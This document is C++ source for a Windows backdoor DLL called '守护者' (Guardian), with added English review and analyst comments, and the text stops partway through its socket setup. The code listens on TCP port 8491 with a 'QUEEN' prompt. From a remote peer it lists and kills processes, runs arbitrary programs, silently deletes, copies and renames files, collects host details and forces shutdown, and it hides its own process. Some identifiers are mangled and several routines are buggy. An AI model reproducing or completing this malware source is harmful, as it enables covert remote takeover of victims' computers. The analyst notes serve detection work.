
守护者DLL的源码

守护者DLL的源码

信息来源:特络纳
#pragma hdrstop
//---------------------------------------------------------------------------
#pragma argsused
#include <windows.h>
#include <winsock.h>
#include <mmsystem.h>
#include <condefs.h>
#include <stdio.h>
#include <tlhelp32.h>
#include <math.h>
// Build-time constants and process-wide state shared by every routine below.
// NOTE(review): each "file://" prefix in this listing looks like a "//" comment
// marker rewritten by the hosting page; it is kept as found -- confirm against a clean copy.
file:// register as a service process (mode value passed to HideProc)
#define SERVICE_PROC 1
file:// unregister the service process (mode value passed to HideProc)
#define UNSERVICE_PROC 0
#define TH32CS_SNAPPROCESS 0x00000002
#define PROCESS_HANDLE_NAME 255
file:// buffer length
#define dwBuffSize 2048
file:// command-line length; sizes the szCommand and szExec buffers in WndProc
#define dwComm 50
// TCP port that InitSocket binds on INADDR_ANY; a network indicator for this sample.
#define PORT 8491
// Private window message through which socket events are delivered to WndProc.
#define WM_SOCKET WM_USER+1
// Prompt text sent to the connected peer; with the banner built in WndProc it is a
// content indicator for traffic on PORT.
#define PROMPT "QUEEN:\\>"
// Winsock version requested by WSAStartup in InitSocket (1.1).
DWORD dwVersion=MAKEWORD(1,1);
// Option value handed to setsockopt(SO_REUSEADDR) in InitSocket.
DWORD dwFlag=TRUE;
WSADATA wsaData;
// createSock is the listening socket; NewSock is the most recently accepted connection
// and is the socket every command handler writes its output to.
SOCKET createSock,NewSock;
SOCKADDR_IN Sock_in,NewSock_in;
// Not referenced anywhere in the visible listing.
LPTSTR szReadBuff,Ob,TempBuff;
int addrlen;
// Module handle and function pointer filled in by HideProc.
HINSTANCE DLLInst;
DWORD (WINAPI *RegisterServiceProcess)(DWORD, DWORD);
//---------------------------------------------------------------------------
// GetOS
// 判断操作系统
//---------------------------------------------------------------------------
// Reports which Windows platform family the host runs.
// Returns VER_PLATFORM_WIN32_WINDOWS or VER_PLATFORM_WIN32_NT, taken from
// OSVERSIONINFO.dwPlatformId as filled in by GetVersionEx.
// NOTE(review): any other platform id leaves the switch without a return statement,
// so the caller receives an undefined value; the result of GetVersionEx is not
// checked and sVersion is never used.
extern "C" __declspec(dllexport)
DWORD WINAPI GetOS()
{
OSVERSIONINFO os;
TCHAR sVersion[MAX_PATH];
// The structure size must be set before the call.
os.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
GetVersionEx(&os);
switch(os.dwPlatformId)
{
case VER_PLATFORM_WIN32_WINDOWS:
return VER_PLATFORM_WIN32_WINDOWS;
case VER_PLATFORM_WIN32_NT:
return VER_PLATFORM_WIN32_NT;
}
}
//---------------------------------------------------------------------------
// HideProc
// 注册进程
//---------------------------------------------------------------------------
// Resolves RegisterServiceProcess from KERNEL32.DLL at run time and calls it for the
// current process id with the caller-supplied mode (SERVICE_PROC / UNSERVICE_PROC).
// Returns TRUE when the export was found and called, FALSE when the library or the
// export could not be obtained; the API's own return value is ignored.
// In this listing WinMain calls it only when GetOS() reports
// VER_PLATFORM_WIN32_WINDOWS, and WndProc calls it with UNSERVICE_PROC on WM_DESTROY.
// NOTE(review): judging by the function name the purpose is to keep the process out of
// the Windows 9x task list -- confirm on a test system. For static triage, the literal
// export name passed to GetProcAddress is a searchable string.
// NOTE(review): the module handle stored in DLLInst is never released.
extern "C" __declspec(dllexport)
BOOL WINAPI HideProc(int mode)
{
DLLInst=LoadLibrary("KERNEL32.DLL");
if(DLLInst)
{
// Looked up by name instead of being linked statically.
RegisterServiceProcess=(DWORD(WINAPI *)(DWORD,DWORD))
GetProcAddress(DLLInst,"RegisterServiceProcess");
if(RegisterServiceProcess)
{
RegisterServiceProcess(GetCurrentProcessId(),mode);
return TRUE;
}
else
return FALSE;
}
else return FALSE;
}
////////////////////////////////////////////////////////////////////////
////
// Enables or disables one named privilege on an access token.
//   hToken           - token to adjust
//   lpszPrivilege    - privilege name resolved with LookupPrivilegeValue on the local system
//   bEnablePrivilege - TRUE sets SE_PRIVILEGE_ENABLED, FALSE clears the attribute
// Returns TRUE on success; FALSE if the name lookup fails or if GetLastError() is not
// ERROR_SUCCESS after AdjustTokenPrivileges. Diagnostics go to stdout via printf.
// The only caller in this listing is KillPS, which passes SE_DEBUG_NAME.
BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL
bEnablePrivilege)//set privilege
{
TOKEN_PRIVILEGES tp;
LUID luid;
if(!LookupPrivilegeValue(NULL,lpszPrivilege,&luid))
{
printf("\nLookupPrivilegeValue error:%d", GetLastError() );
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege)
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
else
tp.Privileges[0].Attributes = 0;
AdjustTokenPrivileges(
hToken,
FALSE,
&tp,
sizeof(TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES) NULL,
(PDWORD) NULL);
// The last-error value is tested rather than the call's return value, so a token
// that does not hold the privilege is reported as a failure too.
if (GetLastError() != ERROR_SUCCESS)
{
printf("AdjustTokenPrivileges failed: %u\n", GetLastError()
);
return FALSE;
}
return TRUE;
}
////////////////////////////////////////////////////////////////////////
////
// Terminates the process with the given id: opens the current process token, asks
// SetPrivilege to enable SE_DEBUG_NAME, opens the target with PROCESS_ALL_ACCESS and
// calls TerminateProcess with exit code 1. Both handles are closed in __finally.
// Returns IsKilled.
// NOTE(review): every failure is only printed and execution carries on, and IsKilled
// is set to TRUE unconditionally at the end of the __try body, so the return value
// does not tell the caller whether the target was actually terminated.
// NOTE(review): bRet is never used.
// Analyst note: enabling the debug privilege and then opening another process with
// PROCESS_ALL_ACCESS is a sequence that endpoint telemetry can record.
BOOL KillPS(DWORD id)
{
HANDLE hProcess=NULL,hProcessToken=NULL;
BOOL IsKilled=FALSE,bRet=FALSE;
__try
{

if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hProcessToken
))
{
printf("\nOpen Current Process Token
failed:%d",GetLastError());
}
// NOTE(review): the "ok" text is printed on the branch taken when SetPrivilege fails.
if(!SetPrivilege(hProcessToken,SE_DEBUG_NAME,TRUE))
{
printf("\nSetPrivilege ok!");
}

if((hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,id))==NULL)
{
printf("\nOpen Process %d failed:%d",id,GetLastError());
}
// Reached even when OpenProcess failed and hProcess is NULL.
if(!TerminateProcess(hProcess,1))
{
printf("\nTerminateProcess failed:%d",GetLastError());
}
IsKilled=TRUE;
}
__finally
{
if(hProcessToken!=NULL) CloseHandle(hProcessToken);
if(hProcess!=NULL) CloseHandle(hProcess);
}
return(IsKilled);
}
//---------------------------------------------------------------------------
// EnumProcess
// 枚举进程
//---------------------------------------------------------------------------
// Takes a Toolhelp process snapshot and writes one line per process (executable name
// and process id) to the connected peer on NewSock, after a header line.
// NOTE(review): the call is spelled createToolhelp32Snapshot here; the page appears to
// have lowercased some identifiers -- confirm against a clean copy.
// NOTE(review): when the snapshot call fails the error text is sent but execution
// continues with the invalid handle, which is later passed to CloseHandle as well.
// NOTE(review): send() results are never checked.
extern "C" __declspec(dllexport)
VOID WINAPI EnumProcess()
{
HANDLE hProcessSnap = NULL;
PROCESSENTRY32 pe32= {0};
TCHAR szFileName[MAX_PATH];
// Source comment on the next two lines (wrapped by the page): "the process list is
// included in the snapshot".
hProcessSnap = createToolhelp32Snapshot(TH32CS_SNAPPROCESS,//进程列表包
含在快照集里
0);//0 means the current process
if (hProcessSnap == (HANDLE)-1)//returns -1 on failure
{
wsprintf(szFileName,"\ncreateToolhelp32Snapshot()
failed:%d",GetLastError());
send(NewSock,"\n\r",2,0);
send(NewSock,szFileName,lstrlen(szFileName),0);
}
// dwSize must be set before Process32First is called.
pe32.dwSize = sizeof(PROCESSENTRY32);
wsprintf(szFileName,"\nProcessName     ProcessID");
send(NewSock,"\n\r",2,0);
send(NewSock,szFileName,lstrlen(szFileName),0);
// Source comment on the next two lines (wrapped by the page): "fetch the first
// process entry from the system snapshot".
if (Process32First(hProcessSnap, &pe32))//取得系统快照集中有关的第一个进
程的信息
{
do
{wsprintf(szFileName,"\n%-20s%d",pe32.szExeFile,pe32.th32ProcessID);
send(NewSock,"\n\r",2,0);
send(NewSock,szFileName,lstrlen(szFileName),0);
}
// Source comment on the next two lines (wrapped by the page): "fetch the next
// process entry recorded in the system snapshot".
while (Process32Next(hProcessSnap, &pe32));//取得记录在系统快照集中
有关的下一个进程的信息
}
else
{
file://printf("\nProcess32Firstt() failed:%d",GetLastError());
}
CloseHandle (hProcessSnap);
}
//---------------------------------------------------------------------------
// LoadProcess
// 执行文件
//---------------------------------------------------------------------------
// Starts the program named by szFileName as a new process with a normally shown window.
// szFileName is passed as the application name; no command line, environment or
// working directory is supplied and handles are not inherited.
// Returns TRUE when the process-creation call succeeds, FALSE otherwise.
// The only caller in this listing is the "execfile" branch of ExeCommand, which hands
// over text received from the network peer.
// NOTE(review): the call is spelled createProcess here (page artifact, presumably
// CreateProcess) and the FALSE token is split across two lines by the page's wrapping.
// NOTE(review): the process and thread handles returned in pi are never closed.
extern "C" __declspec(dllexport)
BOOL WINAPI LoadProcess(LPCTSTR szFileName)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si,sizeof(STARTUPINFO));
ZeroMemory(&pi,sizeof(PROCESS_INFORMATION));
si.cb=sizeof(STARTUPINFO);
si.dwFlags=STARTF_USESHOWWINDOW;
si.wShowWindow=SW_SHOWNORMAL;
if(createProcess(szFileName,NULL,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi)==F
ALSE)
{
return FALSE;
}
return TRUE;
}
//---------------------------------------------------------------------------
// Dir
// 浏览文件,支持通配符
//---------------------------------------------------------------------------
// Enumerates the files matching the pattern in lParam with FindFirstFile/FindNextFile
// and sends one formatted line per entry (name, size, type label) to the peer on
// NewSock. Sends "Can not find directory or files." when nothing matches.
// NOTE(review): lParam is copied into a MAX_PATH buffer with lstrcpy and no length
// check; the same buffer then receives the formatted line, whose name field alone can
// be as long as WIN32_FIND_DATA.cFileName allows, so the buffer can be overrun.
// NOTE(review): the search handle is never released with FindClose.
// NOTE(review): an entry is listed only if it carries one of the five attributes
// tested below; every non-directory branch prints the label ARCHIVE; and
// nFileSizeHigh+nFileSizeLow adds the two halves instead of forming a 64-bit size.
// NOTE(review): i is declared but unused.
extern "C" __declspec(dllexport)
VOID WINAPI Dir(LPCTSTR lParam)
{
WIN32_FIND_DATA wfd;
HANDLE hHandle;
TCHAR szFileName[MAX_PATH];
int i;
wsprintf(szFileName,"\n\n\r");
send(NewSock,szFileName,lstrlen(szFileName),0);
lstrcpy(szFileName,lParam);
if((hHandle=FindFirstFile(szFileName,&wfd))!=INVALID_HANDLE_VALUE)
{
do
{
// Directories first; each branch sends its line and moves to the next entry.
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
wsprintf(szFileName,"%-20s %10lu
<DIR>\n\r",wfd.cFileName,wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
continue;
}
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_ARCHIVE)
{
if(wfd.nFileSizeHigh==0)
wsprintf(szFileName,"%-20s %10lu
ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeLow);
else
wsprintf(szFileName,"%-20s %10lu
ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
continue;
}
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_READONLY)
{
if(wfd.nFileSizeHigh==0)
wsprintf(szFileName,"%-20s %10lu
ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeLow);
else
wsprintf(szFileName,"%-20s
%10luARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
continue;
}
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_HIDDEN)
{
if(wfd.nFileSizeHigh==0)
wsprintf(szFileName,"%-20s %10lu
ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeLow);
else
wsprintf(szFileName,"%-20s %10lu
ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
continue;
}
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_SYSTEM)
{
if(wfd.nFileSizeHigh==0)
wsprintf(szFileName,"%-20s %10lu
ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeLow);
else
wsprintf(szFileName,"%-20s %10lu
ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
continue;
}
}
while(FindNextFile(hHandle,&wfd));
}
else
{
wsprintf(szFileName,"Can not find directory or files.\n\r");
send(NewSock,szFileName,lstrlen(szFileName),0);
}
}

//---------------------------------------------------------------------------
// FileOpertion
// 文件操作函数
//---------------------------------------------------------------------------
// Runs one shell file operation through SHFileOperation.
//   szFileName1 - source path, copied into sr
//   szFileName2 - destination path, copied into de
//   opt         - stored in SHFILEOPSTRUCT.wFunc; callers in this listing pass the
//                 delete, copy and rename operation codes
// Returns TRUE when SHFileOperation returns zero, FALSE otherwise.
// Both buffers get a second terminating NUL because pFrom/pTo are double-NUL-terminated
// lists.
// NOTE(review): the lstrcpy calls are unbounded, and writing the second terminator at
// index lstrlen+1 goes past the array when the string already fills MAX_PATH-1
// characters.
// Analyst note: FOF_SILENT, FOF_NOCONFIRMATION and FOF_NOCONFIRMMKDIR suppress the
// shell's progress and confirmation UI, so nothing is shown to the logged-on user.
// FOF_ALLOWUNDO asks the shell to keep undo information where it can, so files removed
// through this path may still be recoverable during an investigation -- verify per host.
extern "C" __declspec(dllexport)
BOOL WINAPI FileOpertion(LPCTSTR szFileName1,LPCTSTR szFileName2,DWORD
opt)
{
SHFILEOPSTRUCT shf;
TCHAR sr[MAX_PATH];
TCHAR de[MAX_PATH];
lstrcpy(sr,szFileName1);
sr[lstrlen(sr)+1]='\0';
lstrcpy(de,szFileName2);
de[lstrlen(de)+1]='\0';
ZeroMemory(&shf,sizeof(shf));
shf.hwnd=NULL;
shf.wFunc=opt;
shf.pFrom=sr;
shf.pTo=de;
shf.fFlags=FOF_ALLOWUNDO|FOF_SILENT|FOF_FILESONLY|FOF_MULTIDESTFILES
|FOF_NOCONFIRMATION|FOF_NOCONFIRMMKDIR;
if(SHFileOperation(&shf))
return FALSE;
else
return TRUE;
}
//---------------------------------------------------------------------------
// delete
// 删除文件(隐藏,只读),目录,支持通配符
//---------------------------------------------------------------------------
// Deletes the path or pattern in lParam through FileOpertion and reports the outcome
// to the peer on NewSock as a fixed status string.
// NOTE(review): the function name and the FO_delete constant appear lowercased by the
// hosting page (delete is a C++ keyword, so this spelling cannot be the original) --
// confirm against a clean copy.
// The send lengths are one more than the visible text, so the terminating NUL is
// transmitted as part of each status message.
extern "C" __declspec(dllexport)
VOID WINAPI delete(LPCTSTR lParam)
{
if(!FileOpertion(lParam,"",FO_delete))
send(NewSock,"delete File is Fail",20,0);
else
send(NewSock,"delete File is OK",18,0);
}
//---------------------------------------------------------------------------
// Copy
// 复制,上传,下载文件(需先将自己硬盘设置为完全共享),支持通配符
//---------------------------------------------------------------------------
// Copies lParam1 to lParam2 through FileOpertion(FO_COPY) and reports the outcome to
// the peer on NewSock as a fixed status string.
// The send lengths are one more than the visible text, so the terminating NUL is
// transmitted as part of each status message.
extern "C" __declspec(dllexport)
VOID WINAPI Copy(LPCTSTR lParam1,LPCTSTR lParam2)
{
if(!FileOpertion(lParam1,lParam2,FO_COPY))
send(NewSock,"Copy File is Fail",18,0);
else
send(NewSock,"Copy File is OK",16,0);
}
//---------------------------------------------------------------------------
// Ren
// 文件,目录重命名
//---------------------------------------------------------------------------
// Renames lParam1 to lParam2 through FileOpertion and reports the outcome to the peer
// on NewSock as a fixed status string.
// NOTE(review): FO_rename appears lowercased by the hosting page -- confirm against a
// clean copy.
// The misspelled status strings ("Renname", "Reanme") are runtime text exactly as
// published and therefore usable as content indicators.
extern "C" __declspec(dllexport)
VOID WINAPI Ren(LPCTSTR lParam1,LPCTSTR lParam2)
{
if(!FileOpertion(lParam1,lParam2,FO_rename))
send(NewSock,"Renname File is Fail",21,0);
else
send(NewSock,"Reanme File is OK",18,0);
}
//---------------------------------------------------------------------------
// GetSysInfo
// 获取系统信息
//---------------------------------------------------------------------------
// Collects host information and sends it to the peer on NewSock as text: computer
// name, platform family, total physical memory in MB, the Windows and system
// directories, and every fixed, CD-ROM and network drive from A: to Z: (with the
// file-system name for fixed and network drives).
// NOTE(review): szFileSys holds 10 characters but GetVolumeInformation is told the
// buffer is MAX_PATH long; szPath is MAX_PATH yet receives two directory paths plus
// literal text. Both can be overrun.
// NOTE(review): szTemp keeps its previous contents (the computer name) when GetOS()
// returns a value matched by neither case label.
// NOTE(review): none of the API or send() results are checked.
extern "C" __declspec(dllexport)
VOID WINAPI GetSysInfo()
{
TCHAR szBuff[MAX_PATH];
TCHAR szTemp[MAX_PATH];

wsprintf(szBuff,"\n\n\r<<System Information>>\n\n\r");
send(NewSock,szBuff,lstrlen(szBuff),0);
file:// computer name
DWORD len=sizeof(szTemp);
GetComputerName(szTemp,&len);
wsprintf(szBuff,"Computer Name: %s\n\n\r",szTemp);
send(NewSock,szBuff,lstrlen(szBuff),0);
file:// current operating system
switch(GetOS())
{
case VER_PLATFORM_WIN32_WINDOWS:
lstrcpy(szTemp,"Windows 9x");
break;
case VER_PLATFORM_WIN32_NT:
lstrcpy(szTemp,"Windows NT/2000");
break;
}
wsprintf(szBuff,"Option System: %s\n\n\r",szTemp);
send(NewSock,szBuff,lstrlen(szBuff),0);
file:// memory size
MEMORYSTATUS mem;
mem.dwLength=sizeof(mem);
GlobalMemoryStatus(&mem);
// Bytes are converted to megabytes and one is added to the truncated quotient.
wsprintf(szBuff,"Total Memroy: %dM\n\n\r",mem.dwTotalPhys/1024/1024+1);
send(NewSock,szBuff,lstrlen(szBuff),0);
file:// system directories
TCHAR szPath[MAX_PATH];
GetWindowsDirectory(szTemp,sizeof(szTemp));
GetSystemDirectory(szBuff,sizeof(szBuff));
wsprintf(szPath,"Windows Directory: %s\n\n\rSystem Directory:
%s\n\n\r",szTemp,szBuff);
send(NewSock,szPath,lstrlen(szPath),0);
file:// drives and partition types
TCHAR szFileSys[10];
for(int i=0;i<26;++i)
{
// Builds the root path "A:\" .. "Z:\" for the drive-type query.
wsprintf(szTemp,"%c:\\",'A'+i);
UINT uType=GetDriveType(szTemp);
switch(uType)
{
case DRIVE_FIXED:
GetVolumeInformation(szTemp,NULL,NULL,NULL,NULL,NULL,szFileSys,MAX_PATH)
;
wsprintf(szBuff,"Hard Disk: %s (%s)\n\n\r",szTemp,szFileSys);
send(NewSock,szBuff,lstrlen(szBuff),0);
break;
case DRIVE_CDROM:
wsprintf(szBuff,"CD-ROM Disk: %s\n\n\r",szTemp);
send(NewSock,szBuff,lstrlen(szBuff),0);
break;
case DRIVE_REMOTE:
GetVolumeInformation(szTemp,NULL,NULL,NULL,NULL,NULL,szFileSys,MAX_PATH)
;
wsprintf(szBuff,"NetWork Disk: %s (%s)\n\n\r",szTemp,szFileSys);
send(NewSock,szBuff,lstrlen(szBuff),0);
break;
}
}
}
//---------------------------------------------------------------------------
// ExitWin
// 关闭计算机(WIN 9X,NT/2000)
//---------------------------------------------------------------------------
// Shuts the machine down. On the Windows 9x platform it calls ExitWindowsEx(1,0)
// directly. On the NT platform it opens the current process and its token, adjusts
// the token's privileges and then calls ExitWindowsEx(EWX_FORCE|EWX_POWEROFF,0).
// Reached from the "exitwin" command in ExeCommand.
// NOTE(review): the privilege lookup is commented out in this listing, so
// luidPrivilegeLUID is read without ever being assigned.
// NOTE(review): hProcess and hToken are never closed, and the OpenProcess and
// OpenProcessToken results are not checked. ReturnLength is unused.
extern "C" __declspec(dllexport)
VOID WINAPI ExitWin()
{
DWORD dwVer;
HANDLE hProcess, hToken;
TOKEN_PRIVILEGES NewState;
DWORD ProcessId, ReturnLength = 0;
LUID luidPrivilegeLUID;
dwVer=GetOS();
if(dwVer==VER_PLATFORM_WIN32_WINDOWS)
ExitWindowsEx(1,0);
else if(dwVer==VER_PLATFORM_WIN32_NT)
{
ProcessId = GetCurrentProcessId();
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
OpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES, &hToken);
file://LookupPrivilegevalue(NULL, SE_SHUTDOWN_NAME, &luidPrivilegeLUID);
NewState.PrivilegeCount = 1;
NewState.Privileges[0].Luid = luidPrivilegeLUID;
NewState.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if(AdjustTokenPrivileges(hToken, FALSE, &NewState, NULL, NULL, NULL))
ExitWindowsEx(EWX_FORCE|EWX_POWEROFF,0);
}
}
//---------------------------------------------------------------------------
// ChangeDir
// 改变当前目录
//---------------------------------------------------------------------------
// Changes the process's current directory to szDir.
// Returns TRUE when SetCurrentDirectory succeeds, FALSE otherwise.
// Called from the "cd" branch of ExeCommand with text received from the peer.
extern "C" __declspec(dllexport)
BOOL WINAPI ChangeDir(LPCTSTR szDir)
{
if(SetCurrentDirectory(szDir))
return TRUE;
else
return FALSE;
}
//---------------------------------------------------------------------------
// GetCurPath
// 得到当前目录
//---------------------------------------------------------------------------
// Sends the process's current directory to the peer on NewSock as
// "CurrentDirect: <path>".
// NOTE(review): szTemp is MAX_PATH long but receives the label text plus a path that
// may itself be close to MAX_PATH, so the formatted line can overrun it; the result of
// GetCurrentDirectory is not checked.
extern "C" __declspec(dllexport)
VOID WINAPI GetCurPath()
{
TCHAR lpBuff[MAX_PATH];
TCHAR szTemp[MAX_PATH];
GetCurrentDirectory(MAX_PATH,lpBuff);
wsprintf(szTemp,"CurrentDirect: %s\n\r",lpBuff);
send(NewSock,szTemp,lstrlen(szTemp),0);
}
//---------------------------------------------------------------------------
// ExeCommand
// 执行命令
//---------------------------------------------------------------------------
// Command dispatcher for text received from the network peer (WndProc passes the
// accumulated szExec buffer). Four commands are matched exactly -- getinfo, gcpath,
// enumps, exitwin -- and seven by prefix with strncmp -- killps, execfile, cd, dir,
// del, copy, ren. Anything else is answered with "Bad Command !!!". Results and usage
// messages are written to NewSock. hWnd is not used.
// Analyst note: the command words and the fixed reply strings below are literal
// constants in the binary and can serve as static signature content.
// NOTE(review): every scan loop tests `szCommand=='\0'`, which compares the pointer
// itself and not a character, so the loop never breaks early and i ends equal to
// lstrlen(szCommand) whenever the start index does not exceed the length. As a
// consequence the two-argument else-branches of "copy" and "ren" (the only callers of
// Copy and Ren) appear unreachable in this listing.
// NOTE(review): prefix matching means any input that merely starts with a command
// word takes that branch; the branch order decides which one wins.
// NOTE(review): except for "copy" and "ren", a too-short command sends its usage text
// (or lists "*.*" for "dir") and then falls through into the argument handling anyway.
extern "C" __declspec(dllexport)
VOID ExeCommand(LPSTR szCommand,HWND hWnd)
{
TCHAR szBuf[MAX_PATH];
TCHAR Param1[100];
TCHAR Param2[100];
double PidArray[5],pid;
int i;
if((lstrcmp(szCommand,"getinfo"))==0)
GetSysInfo();
else if((lstrcmp(szCommand,"gcpath"))==0)
GetCurPath();
else if((lstrcmp(szCommand,"enumps"))==0)
EnumProcess();
else if((lstrcmp(szCommand,"exitwin"))==0)
ExitWin();
else if((strncmp(szCommand,"killps",lstrlen("killps")))==0)
{
if(lstrlen(szCommand)<=lstrlen("killps")+2)
{
// The length argument (12) is shorter than the usage text, so it is sent truncated.
send(NewSock,"usage : killps PID",12,0);
}
for(i=lstrlen("killps")+1;i<lstrlen(szCommand);i++)
if(szCommand=='\0')
break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("killps")+1);
int e=lstrlen(szCommand)-lstrlen("killps")-1;
// Decimal conversion done by hand: each character minus 48 ('0') is weighted by a
// power of ten.
// NOTE(review): pid is never initialised before the += below, characters are not
// checked to be digits, and PidArray has 5 slots while the loop runs once per
// argument character.
for(int bit=0;bit<i-lstrlen("killps")-1;bit++)
{
PidArray[bit]=(DWORD)Param1[bit]-48;
pid+=PidArray[bit]*pow(10,--e);
}
if(KillPS(pid)==FALSE)
send(NewSock,"killps Fail",12,0);
else
send(NewSock,"killps OK",10,0);
}
}
else if((strncmp(szCommand,"execfile",lstrlen("execfile")))==0)
{
if(lstrlen(szCommand)<=lstrlen("execfile")+2)
{
send(NewSock,"usage : execfile szFileName",28,0);
}
for(i=lstrlen("execfile")+1;i<lstrlen(szCommand);i++)
if(szCommand=='\0')break;
if(i==lstrlen(szCommand))
{
// Everything after the command word and one separator is handed to LoadProcess.
lstrcpy(Param1,szCommand+lstrlen("execfile")+1);
if(LoadProcess(Param1)==FALSE)
send(NewSock,"execfile Fail",14,0);
else
send(NewSock,"execfile OK",11,0);
}
}
else if((strncmp(szCommand,"cd",lstrlen("cd")))==0)
{
if(lstrlen(szCommand)<=lstrlen("cd")+2)
{
send(NewSock,"cd Drive\\Directory",19,0);
}
for(i=lstrlen("cd")+1;i<lstrlen(szCommand);i++)
if(szCommand=='\0')break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("cd")+1);
if(ChangeDir(Param1)==FALSE)
send(NewSock,"Change Directory Fail",21,0);
else
send(NewSock,"Change Directory OK",19,0);
}
}
else if((strncmp(szCommand,"dir",lstrlen("dir")))==0)
{
// A bare or very short "dir" lists everything in the current directory.
if(lstrlen(szCommand)<=lstrlen("dir")+2)
{
Dir("*.*");
}
for(i=lstrlen("dir")+1;i<lstrlen(szCommand);i++)
if(szCommand=='\0')break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("dir")+1);
Dir(Param1);
}
}
else if((strncmp(szCommand,"del",lstrlen("del")))==0)
{
if(lstrlen(szCommand)<=lstrlen("del")+2)
{
// NOTE(review): the length argument (28) is larger than the literal including its
// terminator, so send() reads past the end of the string constant.
send(NewSock,"usage : DEL szFileName",28,0);
}
for(i=lstrlen("del")+1;i<lstrlen(szCommand);i++)
if(szCommand=='\0')break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("del")+1);
delete(Param1);
}
}
else if((strncmp(szCommand,"copy",lstrlen("copy")))==0)
{
if(lstrlen(szCommand)<=lstrlen("COPY")+2)
{
send(NewSock,"usage : COPY Drive\\Filename ",28,0);
return;
}
for(i=lstrlen("copy")+1;i<lstrlen(szCommand);i++)
if(szCommand=='\0')break;
if(i==lstrlen(szCommand))
{
// This branch only replies with a usage-style text; no copy is performed.
lstrcpy(Param1,szCommand+lstrlen("copy")+1);
lstrcpy(Param2,"");
send(NewSock,"Copy File1 to File2",19,0);
}
else
{
lstrcpy(szBuf,szCommand);
// NOTE(review): stores the character '0', not a NUL terminator.
szBuf[i]='0';
lstrcpy(Param1,szBuf+lstrlen("copy")+1);
lstrcpy(Param2,szBuf+i+1);
Copy(Param1,Param2);
}
}
else if((strncmp(szCommand,"ren",lstrlen("ren")))==0)
{
if(lstrlen(szCommand)<=lstrlen("ren")+2)
{
send(NewSock,"usage : REN Drive\\Filename ",28,0);
return;
}
for(i=lstrlen("ren")+1;i<lstrlen(szCommand);i++)
if(szCommand=='\0')break;
if(i==lstrlen(szCommand))
{
// This branch only replies with a usage-style text; no rename is performed.
lstrcpy(Param1,szCommand+lstrlen("ren")+1);
lstrcpy(Param2,"");
send(NewSock,"Ren File1 to File2",19,0);
}
else
{
lstrcpy(szBuf,szCommand);
// NOTE(review): stores the character '0', not a NUL terminator.
szBuf[i]='0';
lstrcpy(Param1,szBuf+lstrlen("ren")+1);
lstrcpy(Param2,szBuf+i+1);
Ren(Param1,Param2);
}
}
else
send(NewSock,"Bad Command !!!",16,0);
}
//---------------------------------------------------------------------------
// InitSocket
// 初始化SOCKET
//---------------------------------------------------------------------------
// Brings up the TCP listener: starts Winsock with the version in dwVersion, creates a
// stream socket, sets SO_REUSEADDR, binds to INADDR_ANY on PORT, listens with a
// backlog of 3 and registers the socket so that FD_ACCEPT and FD_CLOSE events arrive
// at hWnd as WM_SOCKET messages.
// Returns TRUE on success; on any failure shows a message box owned by hWnd, closes
// the socket and returns FALSE.
// Analyst note: the bind address is INADDR_ANY, so the port is reachable on every
// interface of the host; a listening TCP socket on PORT owned by a process without a
// visible window is the network-level indicator for this sample.
// NOTE(review): WSAAsyncselect is spelled with a lowercase "select" here (page
// artifact, presumably WSAAsyncSelect), and the SOCKET_ERROR token in that call is
// split across two lines by the page's wrapping.
// NOTE(review): the socket() result is compared with SOCKET_ERROR, the setsockopt
// result is not checked, and WSACleanup is not called on the failure paths.
extern "C" __declspec(dllexport)
BOOL WINAPI InitSocket(HWND hWnd)
{
if((WSAStartup(dwVersion,&wsaData))!=0)
{
MessageBox(hWnd,"INIT SOCKET ERROR",NULL,MB_OK);
return FALSE;
}
// Source comment on the next two lines (wrapped by the page): "creates a socket; on
// success returns the descriptor of the new socket".
createSock=socket(AF_INET,SOCK_STREAM,0);//用来创建一个套接字,成功返回新
套接字的描述字
if(createSock==SOCKET_ERROR)
{
closesocket(createSock);
MessageBox(hWnd,"SOCKET ERROR",NULL,MB_OK);
return FALSE;
}
Sock_in.sin_family=AF_INET;
Sock_in.sin_port=htons(PORT);
Sock_in.sin_addr.S_un.S_addr=htonl(INADDR_ANY);
setsockopt(createSock,SOL_SOCKET,SO_REUSEADDR,(LPSTR)&dwFlag,sizeof(dwFl
ag));
if(bind(createSock,(LPSOCKADDR)&Sock_in,sizeof(Sock_in))==SOCKET_ERROR)
{
closesocket(createSock);
MessageBox(hWnd,"BIND ERROR",NULL,MB_OK);
return FALSE;
